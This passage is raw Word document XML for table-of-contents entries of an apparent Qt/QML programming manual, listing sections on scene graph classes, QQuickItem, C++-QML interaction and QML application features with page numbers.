          <w:instrText xml:space="preserve"> PAGEREF _Toc483605647 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>337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48" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph-Related Classes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605648 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>337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49" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Pixmap and Threaded Image Support</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605649 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>337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50" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick C++ Classes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605650 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>338</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51" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem Class</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605651 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>341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52" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Custom Scene Graph Items</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605652 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>341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53" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Graphics Resource Handling</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605653 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>341</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54" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Custom QPainter Items</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605654 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>342</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55" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behavior Animations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605655 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>342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56" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Interacting with QML Objects from C++</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605656 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>343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57" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loading QML Objects from C++</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605657 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>343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58" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Accessing Loaded QML Objects by Object Name</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605658 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>344</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59" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Accessing Members of a QML Object Type from C++</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605659 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>345</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605660" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Properties</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605660 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>345</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61" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Invoking QML Methods</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605661 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>346</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62" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connecting to QML Signals</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605662 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>347</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663" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Applications</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605663 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>349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64" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>What is QML?</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605664 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>349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65" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t>What is Qt Quick?</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605665 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>349</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66" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML User Interfaces</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605666 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>350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67" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Buttons, Menus, and other Controls</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605667 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>350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68" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Special Effects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605668 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>350</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69" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Viewing Web Content in QML Applications</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605669 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>351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70" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Sensors, Gestures, and Touch Interfaces</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605670 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>351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71" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Multimedia Content</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605671 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>351</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72" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mobile Devices</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605672 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>351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73" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Code Samples and Demos</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
